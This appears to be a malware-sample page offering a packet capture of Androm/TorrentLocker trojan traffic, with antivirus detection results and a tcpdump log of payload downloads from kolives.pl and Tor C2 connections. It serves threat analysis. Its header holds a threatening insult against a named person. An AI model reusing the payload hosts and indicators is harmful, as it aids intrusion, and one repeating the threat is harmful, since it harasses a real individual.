Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

Androm Malware Trojan PCAP file download Traffic Sample ret.fgh TOR Botnet kolives.pl

Download Attachments

  • 1 pcap ret
    Date added: May 9, 2017 2:11 am Added by: admin File size: 48 KB Downloads: 66
SHA256: 15b7df3bebe6ee5e78fb3bc1baa585ef46801467755a5a168caf098d4bd60310
File name: ret.fgh
Detection ratio: 43 / 61
Analysis date: 2017-05-09 02:07:36 UTC ( 0 minutes ago )

 

Antivirus Result Update
Ad-Aware Trojan.GenericKD.4990716 20170509
AegisLab Ml.Attribute.Gen!c 20170509
AhnLab-V3 Backdoor/Win32.Androm.C1931243 20170508
Arcabit Trojan.Generic.D4C26FC 20170509
AVG Atros5.BCQI 20170509
Avira (no cloud) TR/Crypt.Xpack.buhvp 20170509
AVware Trojan.Win32.Generic!BT 20170508
BitDefender Trojan.GenericKD.4990716 20170509
CAT-QuickHeal Backdoor.Androm 20170508
DrWeb Trojan.Encoder.761 20170508
Emsisoft Trojan.GenericKD.4990716 (B) 20170508
Endgame malicious (high confidence) 20170503
ESET-NOD32 Win32/Filecoder.TorrentLocker.A 20170509
F-Secure Trojan.GenericKD.4990716 20170508
Fortinet W32/Androm.NFCJ!tr.bdr 20170508
GData Win32.Trojan-Spy.Agent.ZL 20170508
Ikarus Trojan.Win32.Filecoder 20170508
Invincea virus.win32.sality.at 20170413
Jiangmin Backdoor.Androm.pjk 20170508
K7AntiVirus Trojan ( 004e26891 ) 20170508
K7GW Trojan ( 004e26891 ) 20170508
Kaspersky Backdoor.Win32.Androm.nfcj 20170508
Malwarebytes Ransom.Crypt0L0cker 20170509
McAfee Artemis!BE5C56E5F772 20170509
McAfee-GW-Edition BehavesLike.Win32.PWSZbot.gc 20170508
Microsoft Ransom:Win32/Teerac 20170509
eScan Trojan.GenericKD.4990716 20170509
NANO-Antivirus Trojan.Win32.Androm.eohsnw 20170508
Palo Alto Networks (Known Signatures) generic.ml 20170509
Panda Trj/CI.A 20170508
Qihoo-360 Trojan.Generic 20170509
Rising Ransom.Teerac!8.57A (cloud:IZp0FFxFPME) 20170508
SentinelOne (Static ML) static engine – malicious 20170330
Sophos Mal/Generic-S 20170508
Symantec Trojan.Gen.2 20170508
Tencent Win32.Trojan.Inject.Auto 20170509
TrendMicro Ransom_Teerac.R08OC0DE617 20170509
TrendMicro-HouseCall Ransom_Teerac.R08OC0DE617 20170509
VIPRE Trojan.Win32.Generic!BT 20170509
ViRobot Trojan.Win32.Z.Androm.483328.N[h] 20170508
Webroot W32.Trojan.Gen 20170509
ZoneAlarm by Check Point Backdoor.Win32.Androm.nfcj 20170509

 

 

2017-05-08 19:53:32.015202 IP 192.168.1.102.54544 > 92.63.195.168.80: Flags [P.], seq 0:396, ack 1, win 256, length 396: HTTP: GET /file/ret.fgh HTTP/1.1
E…..@….|…f\?…..Pxc5.._<7P…….GET /file/ret.fgh HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: kolives.pl
Connection: Keep-Alive

2017-05-08 19:53:51.322616 IP 192.168.1.102.54549 > 31.31.76.169.443: Flags [P.], seq 0:102, ack 1, win 256, length 102
E…n.@…^v…f..L…………jP…O…….a…]…s….o…..K:R..e..Q..).Z.}s.3`….3./.5.
………&………www.93524h67ed8ph8794.com.#..
2017-05-08 19:53:51.497414 IP 192.168.1.102.54549 > 31.31.76.169.443: Flags [.], ack 925, win 253, length 0
E..(n.@…^….f..L……..W….P………….

2017-05-08 19:54:16.838141 IP 192.168.1.102.60151 > 75.75.75.75.53: 57503+ A? inify.hromotor.com. (36)
E..@$……u…fKKKK…5.,`…………..inify.hromotor.com…..
2017-05-08 19:54:16.845579 IP 192.168.1.102.60152 > 75.75.75.75.53: 57503+ A? inify.hromotor.com. (36)
E..@$……t…fKKKK…5.,`…………..inify.hromotor.com…..
2017-05-08 19:54:18.840896 IP 192.168.1.102.60151 > 75.75.75.75.53: 57503+ A? inify.hromotor.com. (36)
E..@$……s…fKKKK…5.,`…………..inify.hromotor.com…..
2017-05-08 19:54:18.846267 IP 192.168.1.102.60152 > 75.75.75.75.53: 57503+ A? inify.hromotor.com. (36)
E..@$……r…fKKKK…5.,`…………..inify.hromotor.com…..
2017-05-08 19:54:20.849064 IP 192.168.1.102.60152 > 75.75.75.75.53: 57503+ A? inify.hromotor.com. (36)
E..@$……q…fKKKK…5.,`…………..inify.hromotor.com…..
2017-05-08 19:54:20.857521 IP 192.168.1.102.60153 > 75.75.75.75.53: 705+ A? ipecho.net. (28)
E..8$……x…fKKKK…5.$.n………….ipecho.net…..
2017-05-08 19:54:21.204761 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [S], seq 2350750627, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4V.@……..f.&….#)………. .M……………
2017-05-08 19:54:21.315533 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [.], ack 3642134850, win 256, length 0
E..(V.@……..f.&….#)…….BP…C2……..
2017-05-08 19:54:21.316422 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [P.], seq 0:103, ack 1, win 256, length 103
E…V.@……..f.&….#)…….BP….?……b…^….Lj=….3.p….=k   ………..a…..3./.5.
………’………www.lnlj3a080d3n022ap2.com.#..
2017-05-08 19:54:21.480455 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [.], ack 927, win 253, length 0
E..(V.@……..f.&….#)……..P…?0……..
2017-05-08 19:54:21.500570 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [P.], seq 103:242, ack 927, win 253, length 139
E…V.@….t…f.&….#)……..P…^)…………..z……..vc.=[..8I…;…M.|….*.)….#.4..”P……r..1.”.D. ).B9f.7       ….j…. .T…k.\..3|<.C       \…..O.mJ.0R”)….6.,.4j.Q….
2017-05-08 19:54:21.644039 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [P.], seq 242:301, ack 927, win 253, length 59
E..cV.@……..f.&….#)……..P……………..0…….o…R..~.K…….^.}Q%……….B……B.
2017-05-08 19:54:21.758580 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [P.], seq 301:338, ack 986, win 252, length 37
E..MV.@……..f.&….#)……..P…Ro…… ..8P.”.O…b.l%…Cpn.o……..
2017-05-08 19:54:21.899962 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [P.], seq 338:375, ack 986, win 252, length 37
E..MV.@……..f.&….#)……..P….L…… O-Y34..x………’.%k.l…=..p.s
2017-05-08 19:54:22.005679 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [.], ack 2532, win 256, length 0
E..(V.@……..f.&….#)…….%P…7………

017-05-08 19:54:25.523098 IP 192.168.1.102.54556 > 83.149.126.139.20612: Flags [P.], seq 0:95, ack 1, win 256, length 95
E…U.@……..fS.~…P.c.-…( P…m…….Z…V..P..bK…<2..:..[…:.]{.@..4…#….3./.5.
……………….www.0jpnndmjgn.com.#..
2017-05-08 19:54:25.676709 IP 192.168.1.102.54556 > 83.149.126.139.20612: Flags [.], ack 941, win 252, length 0
E..(U.@……..fS.~…P.c…..+.P………….
2017-05-08 19:54:25.693581 IP 192.168.1.102.54556 > 83.149.126.139.20612: Flags [P.], seq 95:234, ack 941, win 252, length 139
E…U.@….Z…fS.~…P.c…..+.P………………tBa….ocDs../…rR……@p..*..V.<….V..^.0t…..<..H..!… ..H|.f.(.A/.DLb……..8.q.:.9.Q.._..%..
..1…..u….Z…9..)….
2017-05-08 19:54:25.832643 IP 192.168.1.102.54556 > 83.149.126.139.20612: Flags [P.], seq 234:293, ack 941, win 252, length 59
E..cU.@……..fS.~…P.c…..+.P…3X…………0D..m./$.b.kr….3x..m=…z`..0I…H….
‘V*f…

Leave a Reply